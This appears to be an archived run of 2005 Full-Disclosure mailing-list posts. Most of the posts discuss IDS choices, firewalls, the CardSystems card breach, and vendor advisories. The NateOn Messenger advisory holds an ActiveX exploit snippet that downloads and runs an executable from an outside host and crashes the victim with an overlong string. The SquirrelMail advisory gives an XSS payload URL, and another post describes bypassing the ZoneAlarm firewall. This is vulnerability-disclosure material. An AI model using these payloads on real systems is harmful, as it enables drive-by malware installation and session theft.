Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[fd]

On Wed, 28 Sep 2005, Kenneth F. Belva wrote:

> If the US population is 296 million and 40 million cardholders were
> affected, that means that 13.51 percent of the population would be
> affected (on the assumption that is only US citizens that hold a
> Visa/Mastercard).

Roughly one in every seven-point-four listmates ...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[arif . jatmoko]

Hi,

Try to look at www.nss.co.uk for IDS products comparison. They did lot of
R&D. Obviously, Cisco is not a good one.
Why you're asking about IDS while we could use IPS ?

Cheers,

|+-+--|
||   Fajar Edisya Putera   |  |
||   <[EMAIL PROTECTED]>   |           To:|
||   Sent by:  |   full-disclosure@lists.grok.org.uk  |
||   [EMAIL PROTECTED]|           cc:        (bcc: Arif  |
||   sts.grok.org.uk   |   Jatmoko/IDN/SEA/CCA)   |
|| |           Subject:   |
||   09/28/2005 03:54 PM   |   [Full-disclosure] Suggestion for IDS   |
||   Please respond to Fajar   |  |
||   Edisya Putera |  |
|| |  |
|+-+--|






Dear Experts,

Our company plan to install IDS to protect our resources, I'm already read
about snort as NIDS, but, that's software based. I'm interesting with
hardware based that will work transparently with our Cisco PIX, no need to
make changes in our firewall. What's your suggestion.

Thanks
Fajar___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS

[saintlinu]

Title:
Arbitrary File Download by NateOn Messagener's ActiveX and DoS

Discoverer:    PARK, GYU
TAE ([EMAIL PROTECTED])

Advisory No.:  NRVA05-08

Critical: 
Moderately Critical

Impact:   
Arbitrary file download by NateOn Messagener's ActiveX and DoS

Where:
>From remote

Operating System:  Windows Only

Solution: 
unpatch yet

Workaround:    N / A

 

Notice:   
09. 17. 2005 Initiate notified

       09.
23. 2005 2nd notified

  
09. 27. 2005 3rd notified

  
09. 29. 2005 Vendor didn't response. Disclosure vulnerability

 

Description: 

The NateOn Messenger(See a NRVA05-02) is Internet Instance
Messenger such as MSN, YAHOO and so on

 

If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX

 

and there is another vulnerability like Buffer Overflow

 

See following detail describe:

 

NOT INCLUDED HERE BUT A PIECE OF CODE

 

<--snip-->

 

 i
= GotNate.IsNateonInstall();

 

 if(
i == 1 ) {

   alert('NateOn
Messenger already installed. Do Attack ...');

   //
if you want to second order attack then try

   i
=
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');

   

   //
if you want to crash to victim system the try

   i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');

 }
else {

   alert('NateOn Messenger NOT
Installed');

 }

 








___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SquirrelMail Address Add Plugin XSS

[Moritz Naumann]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



SA0002

+
+SquirrelMail Address Add Plugin XSS+
+


PUBLISHED ON
  Sep 28, 2005


PUBLISHED AT
  http://moritz-naumann.com/adv/0002/sqmadd/0002.txt


PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg/Germany
  http://moritz-naumann.com/

  info AT moritz HYPHON naumann D0T com
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


AFFECTED PRODUCT OR SERVICE
  Address Add Plugin for Squirrelmail >= v1.4.0
  by Jimmy Conner
  http://sqmail.org/


AFFECTED VERSION
  Address Add Plugin Versions 1.9 and 2.0
  Possibly versions < 1.9 (untested)


BACKGROUND
  Everybody knows XSS.
  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml


ISSUE
  A XSS vulnerability has been detected in the Address Add Plugin for
  Squirrelmail. The problem is caused by insufficient input sanitation.

  Sending a HTML email containing an IMG tag which provides a SRC
  attribute pointing at the vulnerable plugin may allow an attacker to
  retrieve the victims' cookie and session information without the
  victim being aware. The exploit may be triggered when the victim
  clicks on a specially crafted URL contained in the email and hovers
  the address book form field.

  The following partial URL demonstrates the issue:

/squirrelmail_root_dir/plugins/address_add/add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('foo');

  Please move your mouse pointer over the input field which says so.

  Other variables on this script can be misused in the same way.


WORKAROUND
  Disable Javascript or disable plugin.


SOLUTIONS
  Version 2.1 of the plugin fixes the issue. The update is available on
  boths the developers' website at
http://sqmail.org
  and on the SquirrelMail website at
http://squirrelmail.org/plugin_view.php?id=101


TIMELINE
  Sep 24, 2005: Maintainer informed
  Sep 25, 2005: First maintainer reply
  Sep 25, 2005: Maintainer provides fix
  Sep 29, 2005: Public disclosure


CREDIT
  N/A


LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDOx0En6GkvSd/BgwRAu4MAKCFk8Qawjt5p5oG1NYJpbvb9S1P5wCfdhDx
KWCJsXrTsmDnB3zv9gN3Nec=
=+0J4
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Kenneth F. Belva]

>> In the paper I ask: "If 40 million customer credit card numbers are
>> exposed in a security breach at the credit card processor CardSystems, why
>> do a significant number of people not cancel their Visa and/or
>> Mastercard?"

>Simple .. because Mastercard/Visa got to avoid having to notify their
>customers of the breach :

>http://www.consumeraffairs.com/news04/2005/cardsystems_court.html

>~Mike.

Mike,

I'm not so sure it's that simple... People were aware of it.

It certainly was all over the press at the time:

http://money.cnn.com/2005/06/17/news/master_card/
http://www.consumeraffairs.com/news04/2005/cardsystems_suit.html

If the US population is 296 million and 40 million cardholders were
affected, that means that 13.51 percent of the population would be
affected (on the assumption that is only US citizens that hold a
Visa/Mastercard).

Not everyone in the US has a Mastercard/Visa so the percentage of those
cardholders affected by the breach is in fact higher. It's hard to keep
that quiet by just not issuing letters to those affected by the breach.

What I wonder about is the applicability of the White and Case study.

When I hear figures of 20%, it really represents a serious financial impact.

One would hear about such loss from publicly traded companies, similar to
the 4% loss in Q2/2005 due to the Wendy's chili case.

Ken
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Kurt Buff]

Frank Knobbe wrote:


> Perhaps you should ask:
> "If 40 million customer social security numbers are exposed in a
> security breach at the credit card processor CardSystems, why do a
> significant number of people not request new social security numbers?"
> 
> After all, there is no limit on liability with fraud on those
> 
> Regards,
> Frank

Easy - you can't get one, so asking won't help.

Unless, of course, you're under the protection of the Federal Witness
Relocation program.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 797-2] Updated zsync i386 packages fix build error

[Michael Stone]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 797-2 [EMAIL PROTECTED]
http://www.debian.org/security/  Michael Stone
September 28th, 2005http://www.debian.org/security/faq
- --

Package: zsync
Vulnerability  : DOS
Problem-Type   : buffer overflow
Debian-specific: no
CVE ID : CAN-2005-1849, CAN-2005-2096

zsync, a file transfer program, includes a modified local copy of
the zlib library, and is vulnerable to certain bugs fixed previously
in the zlib package.

There was a build error for the sarge i386 proftpd packages released in
DSA 797-1. A new build, zsync_0.3.3-1.sarge.1.2, has been prepared to
correct this error. The packages for other architectures are unaffected.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/z/zsync/zsync_0.3.3-1.sarge.1.2_i386.deb
  Size/MD5 checksum:94516 bb4ff605c6e3b94f23dd0986ca55e450

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)

iQCVAwUBQzs06g0hVr09l8FJAQKrLwQAmPfeT1IBuytJJQr6k8nAVvJMAy1YbOua
vkcng39SHCiTP2HPYRxJCGMRvp3EqTx3QFsuhCBCl+cxDIPk63CNIuUBb+WinYN5
h543O3nmIukK4RSESN51E7WULQ6OTINzBM9xLQrFSI0glyRIefEHw/bsSOvz8Bs0
T5EPNapUs9s=
=dC8D
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Need comparison of netscreen and cyberguard

[Ivan .]

http://www.networkcomputing.com/showitem.jhtml?articleID=160910889&pgno=2

cheers
Ivan

On 9/29/05, adnan habib <[EMAIL PROTECTED]> wrote:
>
>
> hi all
>
> please help me i want   some strong points for juniper ,,, help me to defeat
> cybergurad as t runs by scure computing now @  which  they have there own
> firewall..
>
>
>
> best regards \
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Need comparison of netscreen and cyberguard

[adnan habib]

hi all

please help me i want   some strong points for juniper ,,, help me to defeat 
cybergurad as t runs by scure computing now @  which  they have there own 
firewall..




best regards \


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] urgent info require

[Ivan .]

A good start

http://www.networkcomputing.com/showitem.jhtml?articleID=160910889&pgno=2

cheers
Ivan

On 9/27/05, adnan habib <[EMAIL PROTECTED]> wrote:
>
>
> hi security gurus
>
> i want  to implement juniper (netscreen) solution in my company ,,, moveover
> i want to replace cyberguard from juniper ... is there any one let me know
> any strong point that will support me in replacement like weakness in
> cyberguard etc,,
>
> your respoce is highly appricated
>
>
> best regards
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Suggestion for IDS

[Paul Schmehl]

--On Wednesday, September 28, 2005 18:49:32 +0200 Jan Nielsen 
<[EMAIL PROTECTED]> wrote:



Hi Pauk

Can i ask what you were doing that a pix could not handle nat wise ?
just wondering since I have done very extensive and complex nat'ing in
pix'es from 506's up to 535's without any performance problems.

Many different things, none of which I'd prefer to discuss on a list. 
Suffice it to say that we make extremely heavy use of both NAT and PAT, 
with subnetting, over a large address space with a lot of traffic.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Paul Schmehl]

--On Wednesday, September 28, 2005 09:48:36 -0700 Kevin Pawloski 
<[EMAIL PROTECTED]> wrote:



Does the Tipping Point appliance allow you to create custom rules now?


Yes, for some definition of "rules".  For example, you can block individual 
host/port combos or ports or hosts, that sort of thing.  But if you're 
referring to rules like snort rules, which allow you to get really 
granular, not that I'm aware of.  Of course, I'm not TP CLI guru either. 
It has a cisco-like cli that might allow you to do a great deal more than 
what we've been doing through the mgmt console.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Paul Schmehl]

--On Wednesday, September 28, 2005 17:48:59 +0100 "Paul S. Brown" 
<[EMAIL PROTECTED]> wrote:



On Wednesday 28 September 2005 16:56, Michael Holstein wrote:

> If you NAT a lot, PIX can't handle the load.  It also isn't flexible
> enough.

Huh? .. the FWSM (which is PIX and you can have 4 of them in a chassis)
can handle 100 intefaces, 5gpbs, 100k CPS, and 1M concurrent per blade.

http://www.cisco.com/en/US/products/hw/modules/ps2706/ps4452/

Show me an OpenBSD system that can handle 400 interfaces, 20gbps, and 4M
connections (and can do HSRP, etc).

(I'm not trying to start an open-source "holy war" on a newsgrop .. I
use pf too, where I need the granularity -- just not on the whole
network).


I suspect the argument here has to be cost-for-cost - in the price range
for a  decent beefy OpenBSD box you aren't going to be using FWSMs, and I
can quite  believe that the PIXen in that price range don't perform - the
PIX 501 is  specced at 60MB/s throughput and the cheapest retail price I
can find for it  is $678 for the unlimited license version - for the same
money you can get a  beefy PC which will push quite a bit more than 60MB/s

$678?  Ours were in the mid five figure range.  You must be talking about 
SOHO units.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IDS features (was: Suggestion for IDS)

[Kevin Pawloski]

Cutting down on false alerts would be a start and by false
alerts I mean (in this case) alerts such as a receiving MS-SQL worm alerts on your Linux
hosts. 


Yes, you can setup suppression alerts and disable rules but the larger
the network you monitor the more cumbersome that becomes. SourceFire has their
RNA solution which attempts to cut down on this problem but it isn't all the
way there just yet. (Not to mention that feature comes at an additional cost)

On 9/28/05, Alejandro Barrera <[EMAIL PROTECTED]> wrote:
Hi all,   Now that we're talking about IDS, which are, in the list's opinion, the   features they hate more about actual IDS's?   I mean, what features you dream of everytime you have to plat with your IDS
   but you don't have?   Thxs in advanced.--Alejandro Barrera García-OreaR&D Engineerc/ Alcala 268 28027 MadridOffice: +34 91 326 66 11Fax: +34 91 326 66 11e-mail: 
[EMAIL PROTECTED]___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Active Directory and IIS on production servers, and clustering

[Reto Inversini]

Hi,

Derick Anderson schrieb:
> The company I work for (as the only systems administrator) is
> considering a new implementation of their web-based software. To support
> this we will be splitting our single domain into two domains, one for
> production servers and one for employee support (file servers and
> employee workstations). We'll be using at least two IIS servers as a
> front-end to a custom-built service in the production domain.

<...>

> 
> 1. Separation of roles is essential to security as well as reliability.
> 2. Highly sensitive services such as internal DNS and Active Directory
> should never reside on a publicly accessible server.

Yep. Another thing is, that you should harden your system. The more
services are needed the more complicated a system hardening (and
debugging, if something breaks) is. The more services are running, the
bigger the exposure is.

> 3. In general, web applications are the biggest attack surface of any
> organization in terms of threat volume and relative ease of
> exploitation.

Perfectly right. And they are also a good target for (D)DOS attacks ...
And you could also argument by the need of a network segmentation. A
publicly available webserver belongs in a DMZ.

> I'd appreciate any thoughts on this as I am fighting to follow best
> practices in our server environments. I've been reading the Windows
> Server 2003 Security Guide which unfortunately lacks the "Never ever
> have your production IIS servers be domain controllers" statement but
> implies Reasons #1 and #2 with its approach to server hardening.

If you don't want to buy hardware, but invest a little bit in software,
you could consider using VMWare or Virtual Server to build up your
environment. But of course, if you do that, you have to trust the
virtualization techniques :-)

> My second question has to do with clustering: we plan to eventually
> cluster the IIS servers. What impact does that have on Active Directory
> services?

Don't do it - clustered webservers are a pain in the ass. If you want to
gain flexibility and availability use a dedicated load balancer.
Clustering a webserver just adds another level of complexity.

> Thanks,
> 
> Derick Anderson

Regards
Reto Inversini

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Valdis . Kletnieks]

On Wed, 28 Sep 2005 14:46:38 CDT, Todd Towles said:
> Plus, it was shown recently that personal credit card fraud via ID theft
> is smaller than victimless credit card fraud.
> 
> http://www.theregister.co.uk/2005/09/16/gartner_phantom_fraud/

The Google-provided ad at the top says:

Official Check Fraud
Our Solution Software Will Help Prevent Check Fraud-Free Whitepaper
www.sourcetech.com

Try as I might, I keep wanting to parse that as "Our software will guarantee 
that
all of your whitepapers do in fact contain check frauds" :)


pgp7Py4MwjK8P.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Reto Inversini]

Hi,

Michael Holstein wrote:
>> Our company plan to install IDS to protect our resources, I'm already
>> read about snort as NIDS, but, that's software based. I'm interesting
>> with hardware based that will work transparently with our Cisco PIX,
>> no need to make changes in our firewall. What's your suggestion.

Don't throw away your money would be my first advice :-) Think about
what you need to protect and against who. Calculate your risks and
define what measures could mitigate these - an IPS is just one of these
and IMHO not the first one I would use.

If you want to stick with Cisco, there is also an IDS module for the PIX:

http://www.cisco.com/warp/public/cc/pd/sqsw/sqidsz/

But I never played with it, so I can't give you any advice about that.

> 
> 
> My first piece of advice on this is to ignore any company that says they
> deliver a "turnkey" solution. Such a thing doesn't exist.

Full Ack.

> 
> Any IDS will work with any firewall .. unless, of course, you want to
> connect the two together (eg: dynamically ACL the PIX based on what the
> IDS sees). That, IMHO, is an invitation do DOS yourself (think .. I
> spoof a packet that --looks like an attack-- from your upstream router,
> or smtp server, etc). There's dozens of ways to do this, including free
> with snort.

To add to the burden: An IDS/IPS can be tricked in many ways by a
skilled attacker. Therefore, you still need other measures of protection
for your resources. Another question is, how you deal with encrypted
traffic, e.g. traffic to an SSL aware application. Of course you can
break up the SSL traffic and inspect it, but this has serious privacy
issues and poses another risk. If you don't break it up, your
application is still vulnerable to e.g. SQL Injections.

> 
> You can also examine snort's "inline" mode in which you setup bridging
> between two interfaces, and let snort "decide" which packets to forward.
> In order to make such a thing redundant, be prepared to do some fancy
> H/A stuff with a pair of servers.
>
> And don't forget .. an IDS is certianly not "fix and forget" .. it
> requires daily tinkering (new sigs come out daily .. and they're almost
> always noisy and require tuning). In most any decent sized network,
> having a dedicated admin to chase the IDS alerts and keep an eye on
> things is almost a given.

If you really want to "buy" something useful, hire the best admins
available - the ones that take it personally if a system/network doesn't
work as expected. A skilled admin is by far the best protection for your
resources.

> And as for having an IDS "protect" your network .. well .. forget that.
> An IDS is great for statistical research and forensics .. but with
> botnets and whatnot going SSL, you're time/resources are much better
> spent finding your vulnerabilities and patching your hosts.

Yep, and if you want to go even further, harden your hosts, follow the
principle of least privilege and do a decent network separation. And if
you still have some money after that, you can go for an IPS. An IPS can
only work in a very well segmented and documented network. You need to
know your traffic very well, otherwise it would be a shot in your own
leg, if you deploy an IPS as the service interruptions caused by it
would exceed the downtimes by malicious attacks by far.

> 
> My $0.02.

I've thrown in another $0.02 :-)

> 
> Cheers,
> 
> Michael Holstein CISSP GCIA

Best regards
Reto Inversini
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Todd Towles]

Plus, it was shown recently that personal credit card fraud via ID theft
is smaller than victimless credit card fraud.

http://www.theregister.co.uk/2005/09/16/gartner_phantom_fraud/

It is a very good rundown on why the banks just really don't have a
reason to chase after them and stop them.

-Todd

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of Frank Knobbe
> Sent: Wednesday, September 28, 2005 1:54 PM
> To: [EMAIL PROTECTED]
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Is the Bottom Line Impacted by 
> Security Breaches?
> 
> On Wed, 2005-09-28 at 10:22 -0400, Kenneth F. Belva wrote:
> > In the paper I ask: "If 40 million customer credit card numbers are 
> > exposed in a security breach at the credit card processor 
> CardSystems, 
> > why do a significant number of people not cancel their Visa and/or 
> > Mastercard?"
> 
> Simple. The credit card numbers are exposed every time they 
> make a purchase as well. Now, it someone commits fraud with 
> your name and card number (which a convenience store clerk 
> can do himself... no high-profile server breach needed), then 
> the customer is only liable for minimal damages. The risk and 
> liability lies with the credit card company.
> 
> Perhaps you should ask:
> "If 40 million customer social security numbers are exposed 
> in a security breach at the credit card processor 
> CardSystems, why do a significant number of people not 
> request new social security numbers?"
> 
> After all, there is no limit on liability with fraud on those
> 
> Regards,
> Frank
> 
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is the Bottom Line Impacted by Security Breaches?

[Frank Knobbe]

On Wed, 2005-09-28 at 10:22 -0400, Kenneth F. Belva wrote:
> In the paper I ask: "If 40 million customer credit card numbers are
> exposed in a security breach at the credit card processor CardSystems, why
> do a significant number of people not cancel their Visa and/or
> Mastercard?"

Simple. The credit card numbers are exposed every time they make a
purchase as well. Now, it someone commits fraud with your name and card
number (which a convenience store clerk can do himself... no
high-profile server breach needed), then the customer is only liable for
minimal damages. The risk and liability lies with the credit card
company.

Perhaps you should ask:
"If 40 million customer social security numbers are exposed in a
security breach at the credit card processor CardSystems, why do a
significant number of people not request new social security numbers?"

After all, there is no limit on liability with fraud on those

Regards,
Frank



signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Bypassing Personal Firewall (Zone Alarm Pro) Using DDE-IPC

[Debasis Mohanty]

Hi All !!

While I was testing desktop based firewalls (here it is Zone Alarm Pro) with
the firewall evasion kit developed by me, I found that a very old flaw still
exists in many latest versions of desktop based firewalls. It is possible
for a malicious program to bypass a desktop based firewall by using DDE-IPC
(Direct Data Exchange - Interprocess Communications) which enables an
un-trusted program to communicate with the attacker or access internet via
other trusted programs (Ex: Internet Explorer). This flaw is known since
before year 2003. 

As per a post by Te Smith (Sr. Director, Corporate Communications, Zone
Labs), this issue is resolved in higher version Zone Alarm Pro having
Advanced Program Control feature. (Ref #
http://seclists.org/lists/bugtraq/2003/Jul/.html) However, I find that
this issue still exists in higher versions of Zone Alarm Pro and might also
exist in other desktop based firewalls.

I didn't find any good PoC around, so I thought of writing a PoC which can
demonstrate and explain how an un-trusted program can access internet or
establish connection with the attacker via other trusted programs by
leveraging over the DDE-IPC design flaw. 

The PoC can be downloaded from the following link:
http://hackingspirits.com/vuln-rnd/vuln-rnd.html



Cheers 
Tr0y (aka Debasis Mohanty)
www.hackingspirits.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Is the Bottom Line Impacted by Security Breaches?

[Michael Holstein]

I'm not so sure it's that simple... People were aware of it.


Um .. but *which* 40mil was it? Am I one of them? Hearing that 40mil 
random people got nicked is one thing .. me getting a letter from MBNA 
another.


Mastercard/Visa certianly know .. and so do some member banks, because 
some of them (in Australia, IIRC) replaced their cards proactively.


Their "logic" behind this is that their "zero liability due to fraud" 
clauses make it illogical to even care about compromised account numbers 
.. but anyone that's tried to contest a charge (because most don't let 
you do it online like AMEX does) .. can attest to what a major PITA that 
is (certified mail, etc.).



One would hear about such loss from publicly traded companies, similar to
the 4% loss in Q2/2005 due to the Wendy's chili case.


And hopefully .. once they go public .. they'll be held a bit more 
accountable.


~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Suggestion for IDS

[Brown, James]

Title: Re: [Full-disclosure] Suggestion for IDS






Show me an OpenBSD system that can handle 400 interfaces, 
20gbps, and 4Mconnections (and can do HSRP, etc).
 
Regarding HSRP, OpenBSD now has failover with their CARP 
implementation.
And IPSec SA synchronization as well.
 
You may be interested in this presentation
 
http://www.nycbsdcon.org/downloads/NYCBSDCON_failover.pdf
 
Jim B.
 



Note: The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer. Thank you. ThruPoint, Inc.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Suggestion for IDS

[Valdis . Kletnieks]

On Wed, 28 Sep 2005 14:07:08 EDT, Michael Holstein said:

> PCI bandwidth at that rate is 127.2MB/sec (big B). Cisco's figure is 
> 60mb/sec (litte b).



Crap. Sometime after I hit send, that 'b' magically turned lower-case. You're
right, it's only eating 1/8th the PCI bandwidth, not almost all of it. ;)


pgpksD84VUyqY.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] IDS features (was: Suggestion for IDS)

[Alejandro Barrera]

Hi all,
   Now that we're talking about IDS, which are, in the list's opinion, the
   features they hate more about actual IDS's?
   I mean, what features you dream of everytime you have to plat with your IDS
   but you don't have?

   Thxs in advanced.


-- 
Alejandro Barrera García-Orea
R&D Engineer
c/ Alcala 268 28027 Madrid
Office: +34 91 326 66 11
Fax: +34 91 326 66 11
e-mail: [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] OpenServer 5.0.7 OpenServer 6.0.0 : UnZip File Permissions Change Vulnerability

[please_reply_to_security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


__

SCO Security Advisory

Subject:OpenServer 5.0.7 OpenServer 6.0.0 : UnZip File 
Permissions Change Vulnerability
Advisory number:SCOSA-2005.39
Issue date: 2005 September 28
Cross reference:sr894724 fz532853 erg712904
sr894723 fz532852 erg712905
CAN-2005-2475
__


1. Problem Description

A vulnerability in unzip can be exploited by malicious,
local users to perform certain actions on a vulnerable
system with escalated privileges. The vulnerability is
caused due a race condition that exists when the uncompressed
file is closed and before its permissions are changed. This
can be exploited via hardlink attacks to change the permissions
of other files belonging to the user running unzip. Successful
exploitation requires that the malicious user is able to
delete the uncompressed file and replace it with a hardlink
to another file owned by the unzip user, before permissions
are set on the file.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CAN-2005-2475 to this issue.


2. Vulnerable Supported Versions

System  Binaries
--
OpenServer 5.0.7unzip distribution
OpenServer 6.0.0unzip distribution

3. Solution

The proper solution is to install the latest packages.


4. OpenServer 5.0.7

4.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.39/507


4.2 Verification

MD5 (VOL.000.000) = d57b8a54b9547bef09ba1f25dbd2cbf1

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


4.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to a directory

2) Run the custom command, specify an install from media
   images, and specify the directory as the location of the
   images.

5. OpenServer 6.0.0

5.1 Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.39/600


5.2 Verification

MD5 (VOL.000.000) = f31e45c91c87409f487613fdc5c2fb01

md5 is available for download from
ftp://ftp.sco.com/pub/security/tools


5.3 Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to a directory

2) Run the custom command, specify an install from media
   images, and specify the directory as the location of the
   images.

6. References

Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2475
http://marc.theaimsgroup.com/?l=bugtraq&m=112300046224117&w=2
http://www.securityfocus.com/bid/14450
http://www.osvdb.org/18530
http://secunia.com/advisories/16309

SCO security resources:
http://www.sco.com/support/security/index.html
SCO security advisories via email
http://www.sco.com/support/forums/security.html

This security fix closes SCO incidents sr894724 fz532853
erg712904 sr894723 fz532852 erg712905.


7. Disclaimer

SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers
intended to promote secure installation and use of SCO
products.


8. Acknowledgments

SCO would like to thank Imran Ghory for discovering this
weakness.

__

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (UnixWare)

